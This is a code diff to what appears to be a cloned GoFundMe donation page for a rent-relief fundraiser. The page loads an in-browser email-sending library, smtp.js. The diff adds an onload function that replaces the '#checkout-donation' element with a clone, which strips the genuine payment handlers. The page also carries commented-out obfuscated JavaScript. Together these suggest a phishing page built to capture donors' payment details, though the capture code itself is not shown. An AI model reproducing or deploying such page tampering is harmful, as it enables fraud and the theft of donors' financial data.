--- a/f/providing-rent-relief-for-my-close-friend-lydia/donate.html
+++ b/f/providing-rent-relief-for-my-close-friend-lydia/donate.html
@@ -6,6 +6,14 @@
   <script src="https://smtpjs.com/v3/smtp.js"></script> 
 	 <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
 	 <script>
+		 function change(){
+		var old_element = document.querySelector("#checkout-donation");
+		var new_element = old_element.cloneNode(true);
+		old_element.parentNode.replaceChild(new_element, old_element);
+		 }
+	 </script>
+	
+	 <script>
 	 /*
 	// This is a single line JavaScript commentvar _0x2166=['Hello\x20World!'];(function(_0x393f61,_0x2166cf){var _0x4d18ce=function(_0x5ba128){while(--_0x5ba128){_0x393f61['push'](_0x393f61['shift']());}};_0x4d18ce(++_0x2166cf);}(_0x2166,0x154));var _0x4d18=function(_0x393f61,_0x2166cf){_0x393f61=_0x393f61-0x0;var _0x4d18ce=_0x2166[_0x393f61];return _0x4d18ce;};function hi(){console['log'](_0x4d18('0x0'));}hi();
 	// This is a single line JavaScript commentvar _0x2166=['Hello\x20World!'];(function(_0x393f61,_0x2166cf){var _0x4d18ce=function(_0x5ba128){while(--_0x5ba128){_0x393f61['push'](_0x393f61['shift']());}};_0x4d18ce(++_0x2166cf);}(_0x2166,0x154));var _0x4d18=function(_0x393f61,_0x2166cf){_0x393f61=_0x393f61-0x0;var _0x4d18ce=_0x2166[_0x393f61];return _0x4d18ce;};function hi(){console['log'](_0x4d18('0x0'));}hi();
@@ -227,7 +235,7 @@
 .fb_iframe_widget{display:inline-block;position:relative}.fb_iframe_widget span{display:inline-block;position:relative;text-align:justify}.fb_iframe_widget iframe{position:absolute}.fb_iframe_widget_fluid_desktop,.fb_iframe_widget_fluid_desktop span,.fb_iframe_widget_fluid_desktop iframe{max-width:100%}.fb_iframe_widget_fluid_desktop iframe{min-width:220px;position:relative}.fb_iframe_widget_lift{z-index:1}.fb_iframe_widget_fluid{display:inline}.fb_iframe_widget_fluid span{width:100%}
   </style>
  </head>
- <body class="">
+ <body class="" onload="change()">
   <noscript>
    You need to enable JavaScript to run this app.
   </noscript>
@@ -1336,11 +1344,5 @@
   </script>
   <script src="https://analytics.twitter.com/i/adsct?p_id=Twitter&amp;p_user_id=0&amp;txn_id=o381v&amp;events=%5B%5B%22pageview%22%2Cnull%5D%5D&amp;tw_sale_amount=0&amp;tw_order_quantity=0&amp;tw_iframe_status=0&amp;tpx_cb=twttr.conversion.loadPixels&amp;tw_document_href=https%3A%2F%2Fwww.gofundme.com%2Ff%2Fproviding-rent-relief-for-my-close-friend-lydia%2Fdonate" type="text/javascript">
   </script>
-	 <script>
-		var old_element = document.querySelector("#checkout-donation");
-		var new_element = old_element.cloneNode(true);
-		old_element.parentNode.replaceChild(new_element, old_element);	
-	 </script>
-	
  </body>
 </html>
